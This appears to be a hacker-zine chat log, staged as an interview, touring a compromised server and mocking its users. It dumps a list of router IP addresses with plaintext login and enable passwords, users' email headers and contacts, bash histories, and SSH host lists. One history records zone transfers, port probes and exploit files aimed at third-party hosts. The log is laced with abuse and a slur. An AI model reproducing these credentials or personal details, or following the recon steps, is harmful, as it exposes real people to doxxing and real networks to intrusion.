+ darkcube, jduck, shok, cr, cryp, suid, dmess0r, nimrood, duke
+ mux, yowie, udp, korndogz (kinda lame), awnex, jimjones, soupnazi,
+ miff (9mm HFD!), paul, and knowfx.
<pm> damn i have a good memory hehe
<r0b1nleech> I would like to point out for a second that napster is
+ the guy who started napster.com, jbl is cripo of SSG, cr is one
+ of the best known crackers in hacker history (unix bowling team),
+ and duke is the best whitehat i have ever seen.
<pm> yes i've watched cr hack before, he's real good
<pm> and props to #!w00w00 on efnet
<r0b1nleech> What is the #!w00w00 key?
<pm> no key for you r0b1n :)
<pm> route and dugsong hang out there, really elite channel
<r0b1nleech> let's take a break for a second and watch some midget porn
PART TWO:
<r0b1nleech> Welcome back, let's get on with the show.
<pm> hehe
<r0b1nleech> I am currently on pm's system, this is an amazing sight.
+ This system is so locked down its ridiculous. I don't think anyone
+ could ever hack this.
<pm> yes r0b1n, its secured real tight, and has custom freebsd kernel mods.
<r0b1nleech> I am currently sitting in the root directory, pm, show us
+ around :)
<pm> why of course r0b1n.
<pm> hmm where to start
<pm> ok, lets just go straight to the good stuff first
# cd /home/staff/monk
<pm> ok here we are, my sacred directory, this is where all my private
+ files go, all my warez, and all my mail goes.
# ls |less
983.tsl_bind.c* lice420pre7.tar.gz*
BigIron-EXO1.tftp* lo*
BigIron-Exo1.tftp* mail/
BigIron-HE1.tftp* md5passwd.c*
BigIron-HE2.tftp* me.jpg*
BigIron-SU1.tftp* moo*
BigIron-SU2.tftp* ms-ip.txt
Extacy.c mutt-sneakerz-14095-0*
Mail/ mutt-sneakerz-309-0*
Messages* mutt-sneakerz-43165-0*
NetIron-HE1.tftp* new-server-guidelines.txt*
NetIron-HE2.tftp* newircd.tgz*
NetIron-SU1.tftp* par*
NetIron-SU2.tftp* par2.pl*
README* pixconfig*
README.skuld* pm*
Trng-07_BGP4.ppt* pos.ppt*
_mywctb.ircrc* quotes.txt*
a* res.txt*
a.c resume.txt*
acl.txt* rh7linuxconf.pl.txt
ascii_woman.txt* route.gif*
babykitty* sendmail.c
backup.sneakerz.monk.2.28.01.tar.gz server.sh*
bgp.exo* shells*
bobek.c* sinner*
cbufp_cb.pdf* sk8.bx*
cco.txt* skuld3.tar.gz*
chbin* solx86_bind.c
cisco* story*
cluepon.txt* temp/
dave.jpg* textbox.irc.lb3*
fakepmap.c* tmp/
fbsd2.c* tranny.asc*
foodfight.swf* tronban*
freebsd.app* tsl_bind.c*
freebsd.app.old* vchans.txt*
h0h0cc.asc* wanker-14.jpg
hardcopy.0 wctb.irc*
hm/ wu2.6.1.c*
ircchiq.tar www/
kline* xf0rce.zip
libproxybnc-2.0b.tar.gz
<r0b1nleech> Wow, what an absolutely stunning home directory, you
+ so elegantly define caviar dreams.
<pm> i try, hehe, thanks r0b1n
<r0b1nleech> Ok, show us some of your files
<pm> why of course
$ head imnotownedstill.txt
:p_m!dave@right.behind.you PRIVMSG #!w00w00 :gobbles sucks balls
:p_m!dave@right.behind.you PRIVMSG #!w00w00 :we should make them eat our shit
:p_m!dave@right.behind.you PRIVMSG #!w00w00 :then shit out our shit
:p_m!dave@right.behind.you PRIVMSG #!w00w00 :then make them eat the the shit that they shit that was our shit that we made them eat
:p_m!dave@right.behind.you PRIVMSG #!w00w00 :*read slowly*
:p_m!dave@right.behind.you PRIVMSG #!w00w00 :GOBBLES:
:p_m!dave@right.behind.you PRIVMSG #!w00w00 :"ALL YOU MOTHER FUCKERS ARE GONNA PAY, YOU ARE THE ONES WHO ARE THE BALL LICKERS, WE'RE GONNA FUCK YOUR MOTHERS WHILE YOU WATCH AND CRY LIKE LITTLE WHINEY BITCHES, ONCE WE GET TO HOLLYWOOD AND FIND THOSE MIRAMAX FUCKS WHOS MAKEN THE MOVE WE'RE GONNA MAKE THEM EAT OUR SHIT THEN SHIT OUT OUR SHIT AND THEN EAT THEIR SHIT THATS MADE UP OF OUR SHIT THAT WE MADE THEM EAT AND THEN ALL YOU MOTHERFUCKS ARE NEXT"
:p_m!dave@right.behind.you PRIVMSG #!w00w00 :-w00w00
<pm> ok lets see, ah, shells is a pretty private file, i use it for
+ hacking elite shit.
# head -n 20 shells
12.0.40.1 - cisco
12.127.196.202 - cisco1:cisco
131.192.70.218 (s0.inso.bbnplanet.net) - cisco
157.130.68.154 (rutenberg-gw.customer.ALTER.NET) - cisco:cisco
192.195.18.6 (cisco.nstor.com) - cisco
194.149.131.1 (e0-rbs1.MARNet.mk) - gone:quattro224 / ena:%qqriq%
194.149.131.10 (e0-0-rbs3.MARNet.mk)
194.149.131.127 (tc.rek.ukim.edu.mk) - gone:quattro224 / ena:%qqriq%
194.149.131.3 (e0-rbs2.UKIM.edu.mk)
194.149.144.1 - gone:mitre-strelata / ena:rtremt-toboim
194.149.148.2 (rtrzsv.zsv.ukim.edu.mk) - gone:quattro224 / ena:%qqriq%
194.149.150.1 - gone:quattro224 / ena:%qqriq%
194.98.212.19 (bowne-gw.iway.fr) - cisco
200.41.13.242 (200.41.13.242.celcaribe.net) - admin:admin
200.41.13.253 (200.41.13.253.celcaribe.net) - admin:admin
202.109.81.230 - cisco:cisco (switch)
202.161.128.22 - cisco
202.54.40.17 - cisco:cisco
204.167.134.158 (s0.aww.bbnplanet.net) - test:test
207.115.184.1 - cisco
<r0b1nleech> Oh, My, God, are those seriously .edu.mk routers?!
<pm> :)
<pm> ok check this out
# ls Mail
4166174806@mobile.att.net jack@google.com spider@funksion.org
beep-spider@jsnet.com knowfx@sneakerz.org spider@hotmail.com
beepspider@jsnet.com monk@sneakerz.org spider@sneakerz.org
binary@ruiner.halo.nu paul@mu.org sweetiegirl331@aol.com
bright@wintelcom.net promo@akula.com walt@hotmail.com
dav@sneakerz.org soupnazi@sneakerz.org
<pm> i met sweetiegrl331 in #linuxteens, damn shes amazing
<r0b1nleech> Love :)
<r0b1nleech> Hey, I noticed a route.gif in the above output of ls?
<pm> thats route naked at r00tparty 3.
<pm> enough with my homedir for a second, lets check out ratcorpse's
# cd /home/users/rat
# ls
Mail/ funny* me-modified.jpg* rc.c*
adaptec gogo226a.tgz me-original.jpg* shrt*
ass2.doc* hahaha mp3s.txt* sk8.bx*
badass.jpg hehh* ncurses.h sk8.irc*
blingbling.jpg index.html* netscape1.c.txt* term.h
buffr.c* ircrc.example* newfris.jpg* tmp/
damnfunny ircrc.global* ns* tron.txt*
dickd.tar.gz* jim* orange1.jpg url*
elite.c* leto* pageexec.txt* vas0103.txt*
epic* llist.c* patch-howto.html vhosts*
f* log.txt r* wargames*
fefe.zip* mbox rand0m.c* www/
<pm> shes so funny, check out the www
# ls www/
06cubicl.jpg* leet.adv* pumpkin.jpg*
Bow-lusta.txt* lice420pre7.tar* resume*
OBSDecian* links.html* route.gif*
akittens-confessionz* list* route.jpg*
angieb.jpg* logs.html* rpclogo.jpg*
crow/ look.jpg* s/
cvf-sk00led* m1x* sexchart*
cvf-sk00led2* me.gif* shot/
dance.gif* me.html* siphon-v.7.tar*
duke/ misc/ slut1.jpg*
dumbkitten.txt* mixowned* slut2.jpg*
dxmd.jpg* modified.jpg* some-funny-ass-takeover*
dxmpix/ p.jpg* sundevices.beta*
freestyle* pageexec.txt* toomuchtime.jpg*
fugly/ party/ u4ea-skooled*
ghettodxm.jpg* phat1.jpg* url*
gookfest.jpg* phat2.jpg* war*
greets.html* phat3.jpg* warped.jpg*
gross/ phat4.jpg* weed.jpg*
housewarming.jpg* phracklog* whore.jpg*
hp2.adv* pix/ work/
in-bud-we-trust.jpg* potleaf1.jpg*
index.html* prankster.jpg*
<pm> lol, thats confidence
<r0b1nleech> This is great, are you getting all of this guys?
<pm> hohohoho check this out
# cat mailstuff | less
bright:> To: bright@sneakerz.org
bright:Delivered-To: alfred@freebsd.org
bright:Delivered-To: bright@sneakerz.org
bright:Errors-To: announce-admin@bafug.org
bright:Reply-To: Bill Fumerola <billf@mu.org>
bright:Reply-To: Majordomo@FreeBSD.ORG
bright:Reply-To: jgrosch@mooseriver.com
bright:To: "Alfred Perlstein" <bright@sneakerz.org>
bright:To: "Nick Stee." <snicko@noid.org>
bright:To: <bright@sneakerz.org>
bright:To: Alfred Perlstein <bright@sneakerz.org>
bright:To: Bill Fumerola <billf@elvis.mu.org>
bright:To: Jonathan Lemon Alfred Perlstein <bright@sneakerz.org>
bright:To: Josef Grosch <jgrosch@mooseriver.com>
bright:To: Nick S. <snicko@noid.org>
bright:To: Tor.Egge@fast.no
bright:To: alfred@productionbsd.com
bright:To: alfred@wintelcom.net
bright:To: alfred@wintelcom.net (Alfred Perlstein)
bright:To: announce@bafug.org
bright:To: bright@sneakerz.org
cr:Delivered-To: cr@sneakerz.org
cr:Delivered-To: dial.pipex.com-moduspublicity@dial.pipex.com
cr:Delivered-To: mailing list distinctiverecords@listbot.com
cr:Disposition-Notification-To: "RetrO" <r3tro@eresmas.com>
cr:Reply-To: <aidan.clarke@itacsecurity.com>
cr:Reply-To: <keith@ticketweb.co.uk>
cr:Reply-To: confirm-sub-U-EmGb9P23-UBpOrf15CIYImMZ8@yahoogroups.com
cr:Reply-To: confirm-sub-UBu_9nyHo3zeNMDbohWPyl-AC60@yahoogroups.com
cr:Reply-To: freestyle@breakbeat.com
cr:Reply-To: gay@breakbeat.com
cr:Reply-To: root@sneakerz.org
cr:To: "'cr@sneakerz.org'" <cr@sneakerz.org>
cr:To: "CafePress.com Member" <reply@cafepress.com>
cr:To: "Zarul" <zarulsa@pc.jaring.my>,
cr:To: "cr" <cr@sneakerz.org>
cr:To: <Undisclosed-Recipient:@post.webmailer.de;>
cr:To: <cr@sneakerz.org>
cr:To: <sjd@tpg.com.au>
cr:To: <soniatoby.soto@virgin.net>
cr:To: List Member <cr@sneakerz.org>
cr:To: List Owner <cr@sneakerz.org>
cr:To: ListBot Member <cr@sneakerz.org>
cr:To: Rob Davis ; Rob Hives ; Rob Mac ; Rob Wood ; Toby Martin (E-mail) ; =
cr:To: Scott Douglas <sjd@tpg.com.au>
cr:To: Trevor Wyatt ; Trevor Nelson ; trax ; Tracie storey ; tee bone ; =
cr:To: cr@sneakerz.org
cr:To: cr@sneakerz.org <cr@sneakerz.org>
cr:To: jody.melbourne@itacsecurity.com
cr:To: pm@sneakerz.org
cr:To: r0n/ Patch / Buddha Man / PLS <rpm@airmail.net>
cr:To: rpm@airmail.net
cr:To: undisclosed-recipients:;
cr:To: www.inbox.net@airmail.net
cr:X-Envelope-To: moduspublicity@dial.pipex.com
desl:Delivered-To: desl@sneakerz.org
desl:To: Dan Lennon <desl@sneakerz.org>
desl:To: desl@sneakerz.org
g:Delivered-To: g@sneakerz.org
g:Reply-To: "eBay Marketing" <marketing@welcome.ebay.com>
g:Reply-To: "eBay" <marketing@welcome.ebay.com>
g:Reply-To: Sales@MDaemon.com
g:Reply-To: eBay's Scoot Pursuit <scoot.pursuit@optin.com.au>
g:Reply-To: update@update.deerfield.com
g:To:
g:To: "Glen Messenger (E-mail)" <g@sneakerz.org>
g:To: "Morrison, Garth" <Garth.Morrison@act.gov.au>,
g:To: g@sneakerz.org
g:To: valued_customer@deerfield.com
g:X-MDaemon-Deliver-To: g@sneakerz.org
james:>Delivered-To: josh@strangled.net
james:>To: Joshua Anderson <josh@strangled.net>
james:Apparently-To: <alanst@tranquility.net>
james:Apparently-To: <albright@tranquility.net>
james:Apparently-To: <audrey@tranquility.net>
james:Apparently-To: <cbaker@tranquility.net>
james:Apparently-To: <christy@tranquility.net>
james:Apparently-To: <cmcs@tranquility.net>
james:Apparently-To: <dano@tranquility.net>
james:Apparently-To: <kallen@tranquility.net>
james:Apparently-To: <robs@tranquility.net>
james:Delivered-To: <james@sneakerz.org>
james:Delivered-To: james@sneakerz.org
james:Delivered-To: james@strobe.org
james:Errors-To: online1@wellsfargo.m0.net
knowfx:>To: ms Essive <edifast@hotmail.com>
knowfx:Delivered-To: dskz-outgoing@informationwave.net
knowfx:Delivered-To: dskz@informationwave.net
knowfx:Delivered-To: knowfx@sneakerz.org
knowfx:Delivered-To: mailing list isn@securityfocus.com
knowfx:Delivered-To: mailing list staff@staff.neethosting.com
knowfx:Delivered-To: moderator for isn@securityfocus.com
knowfx:Errors-To: admins-errors@java.blackened.com
knowfx:In-Reply-To: <2004@ravine.binary.net> from "redmare" at
Mar 23, 2001 01:02:39 PM
knowfx:In-Reply-To: <2033@java.blackened.com>; from rockwood@concentric.net
knowfx:In-Reply-To: <2087913@java.blackened.com>; from rockwood@concentric.net
knowfx:In-Reply-To: <200@java.blackened.com> "from Jill Luster
knowfx:In-Reply-To: <OE41@LocalDomain> from Scott
knowfx:Reply-To: dskz@informationwave.net
soupnazi:Reply-To: "Anissa" <anissaho@look.ca>
soupnazi:Reply-To: "Nuno Fernandes" <nfernandes@real-secure.com>
soupnazi:Reply-To: <Cbrinson@apexsystemsinc.com>
soupnazi:Reply-To: <cokeworld@ureach.com>
soupnazi:Reply-To: Nightlife-feedback-25@lb.bcentral.com
soupnazi:Reply-To: jeff@altaassociates.com
soupnazi:Reply-To: orders@crutchfield.com
suid:Delivered-To: BUGTRAQ@securityfocus.com
suid:Delivered-To: bugtraq@lists.securityfocus.com
suid:Delivered-To: bugtraq@securityfocus.com
suid:Delivered-To: suid@sneakerz.org
suid:In-Reply-To:
suid:Reply-To: root@sneakerz.org
suid:Reply-To: suid@SNEAKERZ.ORG
suid:To:
suid:To: (Recipient list suppressed)
suid:To: <suid@sneakerz.org>
suid:To: BUGTRAQ@SECURITYFOCUS.COM
suid:To: Kris Hunt <suid@sneakerz.org>
suid:To: Suid <suid@sneakerz.org>
suid:To: suid@SNEAKERZ.ORG
suid:To: suid@sneakerz.org
suid:X-To: h@CKZ.ORG
yowie:Delivered-To: yowie@sneakerz.org
yowie:To: Yowie <yowie@sneakerz.org>
<pm> haha, ok check this out
<pm> oh by the way, I HAVE NEVER BEEN OWNED, AND ALL YOU FUCKERS WHO SAY
+ YOU OWN ME, YOU DONT OWN SHIT YOU ARE JUST A BUNCH OF COWARDS AND
+ SCRIPT KIDDIES WHO DONT KNOW JACK SHIT ABOUT ANYTHING.
# cd /root
# cat .bash_history|less
ls
more doimport
cd src
ls
make
pwd
ls -la
cd ..
lso
ls
sh doimport
top
top
w
ps -aux | grep zmagic
ps -auwwx | grep zmagic
w
netstat 1
top
w
ps -aux | grep zmagic
watch -W p7
w
top
top
w
ps -aux | grep irc
kill -9 9989
ps -aux | grep zmagic
w
w
top
top
w
top
w
ls
top
ls
ls -la
top
cd /home/users/zmagic/
ls
ls- la
ls -la
top
top
last zmagic
top
ls
top
cd /home/users/par
ls
ls -al
cd ..
cd /home/users/rat
ls -al
head haha
less -R IrcLog
cd /home/staff/ps
ls -al
less .bash_history
ps -aux | grep soupnazi
watch -W p9
cd /usr/src
ls
cd /usr/src
ls
ls -la
cd /shit/FreeBSD4/
ls
more doimport
cd /shit/FreeBSD4/
ls
cd cvs/
ls
ls -la
cd src
ls
ls -la
cd /shit/FreeBSD4/
ls
cd svc
cd cvs
ls
cd src/
ls
ls -la
make buildworld
ls
ls
cvs
cvs import
cd /usr/src
cvs import
cvs update
ls
pwd
ls
ls-la
ls -l
cd sys
ls
ls -l
date
cd ..
ls
pwd
cd sys
ls
locate newvers.sh
cd /usr/src/sys/conf/
ls
df
cu -l cuaa0
cd /eyc
cd /etc
ls
cd namedb/
ls
cd
cd /usr/ports/
ls
cd net/
whereis named
whereis bind
ls
cd ..
ls
cd sysutils/
ls
cd ..
ls
whereis bind
whereis bind8
cd net/
ls
cd bind8/
make install all
cd /etc
ls
cd namedb/
ls
ci named.conf
vi named.conf
who
w
write josh
who
vvcc
c
who
w
ps -ax
cd /etc
ls
who
w
vi named.conf
vi named.conf
vi named.conf
ls
sh make-localhost
ls
vi localhost.rev
ls
rm localhost.rev
ls
vi named.conf
vi db.127.0.0
vi db.127.0.0
ls
pwd
w
ls
vi named.conf
vi db.207.154.226
ls
vi db.sneakerz
ls
who
cd /etc/namedb/
ls
cd /var/log
ls
tail messages
vi /etc/rc.conf
ifconfig -a
grep named /etc/defaults/rc.conf
vi /etc/rc.conf
ls
vi /etc/rc.conf
ls
cd
ls
cd /home/dave
l;s
cd /home
ls
cd /home/dave
l;s
cd /home
ls
cd staff/
ls
cd ps
ls
cd ..
cd josh/
ls
cd ..
cd dave
ls
ls -al
cd
vi /etc/group
ls
ndc start
whereis ndc
tail messages
ssh -p220 dave@t1.google.com
who
cd /usr/ports/
ls
cd irc
ls
cd epic4/
ls
make install all
ls
cd
cd /usr/ports/
ls
cd irc
ls
who
write root
ssh -p220 dave@t1.google.com
who
telnet 0 21
who
ps -ax
ssh -p220 dave@t1.google.com
epic
w
su - dave
write root
w
vi /etc/inetd.conf
cd
su - dave
killall -HUP inetd
su - dave
write root
write root
su - dave
cd /usr/ports/www/
ls
cd w3m
su - monk
su - dave
cd /home/staff/
ls -l josh/
ls -l ps/
cd
su - dave
write ps
w
cd /home/nm
cd /home/ncvs/
ls
screen vi setuid.today
grep rc.local /etc/*
vi /etc/rc.local
vi /etc/virtualip
sh /etc/rc.local
ifconfig -a
w
w
df
w
w
dmesg
grep smurf /usr/ports/INDEX
cd /usr/ports/security/smurflog/
ls
make
w
dmesg
top
w
ifconfig -a
tcpdump
find /sbin -perm 4000
find /sbin -perm -1000
ps ax
ls -l /sbin
df
less /var/log/setuid.today
grep root /var/log/messages
top
last jimjones
w
hostname
we
e
w
ps -ax
cd /home
ls
cd staff/
ls
cd /usr/local/apache/htdocs/
ls
more index.html
cd /shit/FreeBSD4/
cvsup -L 2 supfile
export HOME=/root
ls
pwd
ls -la
more /home/staff/ps/.bash_history
top
more /home/staff/ps/.bash_history
ht
mutt
<pm> thats history in the making
<r0b1nleech> Looking at your history files makes me want to read SECURING LINUX
+ IN 21 DAYS, all over again. Caviar dreams pm, caviar dreams.
<pm> yah hehe
<pm> did you see me ssh into google.com? wish you had my password huh? :)
<r0b1nleech> :D
<pm> ok i got so much stuff for your wonderful tv show
# cd /
# cat sshstuff1 | less
home/users/billf/.bash_history:ls -l .ssh/authorized_keys
home/users/billf/.bash_history:ls .ssh/
home/users/billf/.bash_history:mkdir .ssh
home/users/billf/.bash_history:vi .ssh/authorized_keys
home/users/billf/.bash_history:vi .ssh/authorized_keys
home/users/cr/.bash_history:ssh -lcr el8.net
home/users/cr/.bash_history:ssh -lcr meth.lab.org
home/users/cr/.bash_history:ssh -lrogue puck.nether.net
home/users/cr/.bash_history:ssh -ls33r freenet.nether.net
home/users/james/.bash_history:ssh 209.63.220.137
home/users/james/.bash_history:ssh 64.38.245.135
home/users/james/.bash_history:ssh 64.38.247.160
home/users/james/.bash_history:ssh 64.38.247.180
home/users/james/.bash_history:ssh afraid.org
home/users/james/.bash_history:ssh cb2.kglimited.net
home/users/james/.bash_history:ssh ns1.kglimited.net
home/users/mux/.bash_history:mkdir .ssh
home/users/mux/.bash_history:scp mux.dyn.dhs.org:.ssh/id_dsa.pub .ssh/authorized_keys2
home/users/scott/.bash_history:ssh -l skl pav-l1.hotmail.com
home/users/scott/.bash_history:ssh mu.org
home/users/suid/.bash_history:cd .ssh
home/users/suid/.bash_history:ssh -l suid CPE-61-9-178-2.vic.bigpond.net.au
home/users/walt/.bash_history:ssh 216.32.183.201
home/users/walt/.bash_history:ssh -p 216.32.183.201
home/users/walt/.bash_history:ssh 216.32.183.201
home/users/walt/.bash_history:ssh 216.32.183.201 -P
home/users/walt/.bash_history:ssh aaronsca@mu.org
home/users/walt/.bash_history:ssh pav-l1.hotmail.com
# cat scpstuff1 | less
home/users/mux/.bash_history:scp mux.dyn.dhs.org:.ssh/id_dsa.pub .ssh/authorized_keys2
home/users/oobe/.bash_history:scp -v bzImage 64.208.38.1:.
home/users/oobe/.bash_history:scp -v bzImage root@64.208.38.2:.
home/users/oobe/.bash_history:scp bzImage root@64.208.38.2:.
home/users/oobe/.bash_history:scp bzimage root@64.208.38.2:.
home/users/scott/.bash_history:scp evanw16.Imagine.IL.US.NeverNET.Net 62.252.9.43:~/
home/users/yowie/.bash_history:scp xf0rce.zip yowie@61.12.36,180:.
home/users/yowie/.bash_history:scp xf0rce.zip yowie@61.12.36.180:.
<r0b1nleech> Ok pm, I am so so so so so sorry to interrupt you, but can
+ you please show me cr's history file?
<pm> that, i can do
<r0b1nleech> UNIX BOWLERS!
# cd /home/users/cr
# less .bash_history
ls -l /dev/null
ls -la .bash_history
rm .bash_history
grep HIST .*
set
vi .profile
screen -r
mutt
screen -r
screen -r
telnet mail.itacsecurity.com 110
telnet mail.itacsecurity.com 110
telnet mail.itacsecurity.com 110
mail
telnet mail.itacsecurity.com 25
screen -r
screen -r
host -l workcover.com
telnet www.sb.workcover.com 80
telnet www.sb.workcover.com 443
telnet www.sb.workcover.com 21
ftp www.sb.workcover.com
more passwd
rm passwd
telnet www.sb.workcover.com 23
telnet www.sb.workcover.com 22
telnet www.sb.workcover.com 25
telnet www.sb.workcover.com 110
telnet www.sb.workcover.com 513
telnet www.sb.workcover.com 79
telnet www.sb.workcover.com 111
host -l workcover.com
telnet 150.101.73.34 v21
telnet 150.101.73.34 21
telnet 150.101.73.34 22
telnet 150.101.73.34
telnet 150.101.73.35 80
telnet 80
telnet 192.231.203.33 80
telnet 192.231.203.33 21
telnet 192.231.203.33 111
telnet 192.231.203.33 110
telnet 192.231.203.33 22
telnet 192.231.203.33 25
telnet 192.231.203.33 79
whisker.pl
host -l workcover.com.au
host -l workcover.com
telnet www.workcover.com 80
telnet www.internal.workcover.com 80
telnet internal.workcover.com 80
telnet www.school.workcover.com 80
telnet www.users.on.net 110
telnet www.users.on.net 21
nmap 150.101.73.34
exit
ls -l
screen -r
slookup right.behind.you
nslookup right.behind.you
screen -r
script work
ls -l work
gzip work
chmod a-r work.gz
ls -l
screen -r
nslookup www.e-safety.sa.gov.au
host -l e-safety.sa.gov.au
host -l sa.gov.au
mutt
screen -r
screen -r
exit
mutt
exit
host -l workcover.com
host -l internal.workcover.com
z0ne
nslookup 150.101.73.100
nslookup 150.101.73.101
nslookup 150.101.73.1
nslookup 150.101.73.2
nslookup 150.101.73.34
nslookup 150.101.73.35
nslookup 150.101.72.1
nslookup 150.101.72.2
screen -r
exit
mutt
screen -r
mutt
screen -r
bx cr_ irc.idle.net
screen -r
more wu261.c
more wu261.c
more wu2.6.1.c
more rh7linuxconf.pl.txt
mutt
screen -r
screen -r
mutt
screen 0r
screen -r
mutt
exit
mutt
screen -r
screen -r
slookup itac1.lnk.asionline.net
nslookup itac1.lnk.asiaonline.net
nslookup itac1.lnk.cbr.asiaonline.net
host -l lnk.asiaonline.net
host -l lnk.cbr.asiaonline.net
host -l cbr.asiaonline.net
nslookup itac1.sbr.asiaonline.net
nslookup itac1.cbr.asiaonline.net
screen -r
mutt
screen -r
screen -r
mutt
exit
ls
exit
ls
cp admtac0s-bin.gz www
lynx sneakerz.org/~cr
ls
ls -la
screen -r
screen -r
screen -r
*.c
ls *.c
screen -r
more wu2.6.1.c
screen -r
grep site wu*.c
screen -r
more wu261.c
screen -r
more wu261.c
screen -r
screen -r
ls
screen -r
ls
more linuxconf.c
ssh -ls33r freenet.nether.net
telnet freenet.nether.net
telnet freenet.nether.net 21
telnet puck.nether.net 22
ssh -lrogue puck.nether.net
screen -r
ar zxvf linuxconf-xpl.tar.gz
tar zxvf linuxconf-xpl.tar.gz
more linuxconf-xpl.
more linuxconf-xpl.c
screen -r
s
ls
screen -r
screen -r
ssh -lcr el8.net
screen -r
exit
screen -r
exit
screen -r
exit
set
export TERM=vt100
screen -r
cd www
;s
ls
mail guy@breakbeat.com
screen -r
telnet 150.101.73.100 80
telnet 150.101.73.100 80
telnet 150.101.73.100 80
screen -r
ls
ls *.c
screen -r
screen -r
ls
ls *.c
screen -r
mutt
exit
mutt
screen -r
export IRCNAME="flip the track, bring the oldschool back"
bx cr irc.mcs.net
screen -S ef bx cr irc.mcs.net
telnet 150.101.73.100 80
telnet 150.101.73.100 80
screen -r
screen -r
exit
screen -r
lynx www.apache.org
lynx www.slashdot.org
lynx www.slashdot.org
lynx www.slashdot.org
lynx www.slashdot.org
screen -r
exit
screen -r
mutt
tar zxvf work.gz
tar zxvf route_finder.tar.gz
cd rf
ls -l
more route_finder
more word_route_finder
screen -r
ls
more route_finder
ls
more word_route_finder
ls
cd ..
ls
exit
mutt
screen -r
ls
cd rf
ls
more words
rm words
ls
ls -la
cd ..
ls *.tar.gz
screen -r
exit
mutt
screen -r
w
screen -r
ls -la
more linuxconf-xpl.c
screen -r
ls
exit
screen -r
mutt
screen -r
telnet 150.101.73.100 80
screen -r
exit
mutt
screen -r
host -l workcover.com
dig @workcover.com any any
telnet 150.101.73.100 80
telnet 150.101.73.100 53
sscreen -r
traceroute
traceroute 150.101.73.34
screen -r
bx cr irc.oz.org
screen -r
nslookup 203.53.186.41
nslookup 203.53.186.1
mutt
screen -r
telnet www.afp.gov.au 80
head 3.c
screen -r
mail buo@ussrback.com
date
screen -r
ls
cat 3.c |mail buo@ussrback.com
screen -r
mutt
screen -r
clear
cd .hi
cd rf
ls
more route_finder
ls
more word_route_finder q
ls
screen -r
ls
more 1.c
more 1.c
ls
more 3.c
ls
ls *.c
more fbsd2.c
more fbsd.c
more fbsd.c
gcc fbsd.c -o fbsd
./fbsd
./fbsd 0
screen -r
more fbsd.c
qtail fbsd.c
tail fbsd.c
screen -r
ssh -lcr meth.lab.org
screen -r
ssh -lcr el8.net
screen -r
nmap
ls
more crpron
cd ..
screen -r
telnet www.horseland.com 80
telnet www.horseland.com 443
screen -r
screen -r
mutt
screen -r
screen -r
vi
cat pro |cut -f2 -d" "
cat pro |cut -f2 -d" ">> pro2
more pro2
rm pro*
screen -r
screen -r
bx cr irc.dal.net
bx cr irc.austnet.org
bx cr irc.undernet.org
screen -r
exit
screen -r
nc
find / -name nc -print 2>/dev/null
screen -r
screen -r
mutt
screen -d -r
box to even get questioned by the feds in .au though
mutt
exit
<pm> hahahaha
<r0b1nleech> pm, I can't stop but ask, why was cr doing nslookup on
+ right.behind.you?
<pm> LOL
<pm> im laughing my ass off
<pm> it also looks like he tried to own my system with that fbsd.c shit
<pm> i should kick all these users off and add more elite ones, more
+ w00w00 people.
# cd /
# cat bitchxstuff1 | less
-rw-r----- 1 cr users 832281 home/users/cr/.BitchX/BitchX.away
-rwx------ 1 g users 29427 home/users/g/.BitchX/BitchX.away*
-rw-r----- 1 mux users 38061 home/users/mux/.BitchX/BitchX.away
-rw-r----- 1 suid users 270331 home/users/suid/.BitchX/BitchX.away
-rw------- 1 udp users 5229 home/users/udp/.BitchX/BitchX.away
-rw-r----- 1 zmagic users 4312 home/users/zmagic/.BitchX/BitchX.away
<r0b1nleech> cr's away file is huge :D
<pm> i will show it to you later during our private session
<pm> i would also like to reiterate that I HAVE NEVER BEEN OWNED. ONE DAY
+ THE POWER SUPPLY BLEW UP BECAUSE A TERMITE ATE THE WOOD CASING. MY
+ SYSTEM IS NOT DOWN BECAUSE IT WAS HACKED, IT HAS NEVER BEEN HACKED, AND
+ NONE OF YOU CAN HACK IT. IF ANYONE CAN HACK IT, SHIT, I WILL GIVE THEM
+ A BLOWJOB COURTESY OF SNEAKERZ (TM) NETWORKS.
<pm> r0b1n, people on my system ssh (not telnet) to some of the most
+ incredible and secure systems in the universe, take a look see
# cd /
# cat sshstuff2 | less
home/staff/monk/.ssh/known_hosts:funksion.org
home/staff/monk/.ssh/known_hosts:9mm.com
home/users/awnex/.ssh/known_hosts:shadowside.org
home/users/billf/.ssh/known_hosts:elvis.mu.org
home/users/billf/.ssh/known_hosts:hate.chc-chimes.com
home/users/bright/.ssh/known_hosts:hardcode.wintelcom.net
home/users/cr/.ssh/known_hosts:ns6.siteleader.net
home/users/cr/.ssh/known_hosts:meth.lab.org
home/users/cr/.ssh/known_hosts:61.12.32.120
home/users/cr/.ssh/known_hosts:titus.visual.com
home/users/cr/.ssh/known_hosts:www.breakbeat.com
home/users/cr/.ssh/known_hosts:breakbeat.com
home/users/cr/.ssh/known_hosts:wstrn.com
home/users/cr/.ssh/known_hosts:puck.nether.net
home/users/cr/.ssh/known_hosts:el8.net
home/users/g/.ssh/known_hosts:198.142.183.24
home/users/g/.ssh/known_hosts:yowie.kg
home/users/g/.ssh/known_hosts:198.142.196.172
home/users/g/.ssh/known_hosts:203.28.37.130
home/users/g/.ssh/known_hosts:breakbeat.web.us.uu.net
home/users/james/.ssh/known_hosts:atlantis.tranquility.net
home/users/james/.ssh/known_hosts:0
home/users/james/.ssh/known_hosts:shell1.tranquility.net
home/users/james/.ssh/known_hosts:blacklight.strobe.org
home/users/james/.ssh/known_hosts:bl.strobe.org
home/users/james/.ssh/known_hosts:206.152.119.225
home/users/james/.ssh/known_hosts:tranq3.tranquility.net
home/users/james/.ssh/known_hosts:afraid.org
home/users/james/.ssh/known_hosts:stats.paycounter.com
home/users/james/.ssh/known_hosts:63.195.184.43
home/users/james/.ssh/known_hosts:63.195.184.247
home/users/james/.ssh/known_hosts:63.195.184.126
home/users/james/.ssh/known_hosts:ns1.wintelcom.net
home/users/james/.ssh/known_hosts:tranq1.tranquility.net
home/users/james/.ssh/known_hosts:jobe.strobe.org
home/users/james/.ssh/known_hosts:strobe.org
home/users/james/.ssh/known_hosts:64.166.225.94
home/users/james/.ssh/known_hosts:mir.base16.org
home/users/james/.ssh/known_hosts:home.afraid.org
home/users/james/.ssh/known_hosts:cb1.wintelcom.net
home/users/james/.ssh/known_hosts:12.153.162.137
home/users/james/.ssh/known_hosts:64.38.247.160
home/users/james/.ssh/known_hosts:64.38.247.180
home/users/james/.ssh/known_hosts:cb2.kglimited.net
home/users/james/.ssh/known_hosts2:afraid.org
home/users/james/.ssh/known_hosts2:c191933-b.clmba1.mo.home.com
home/users/james/.ssh/known_hosts2:home.strobe.org
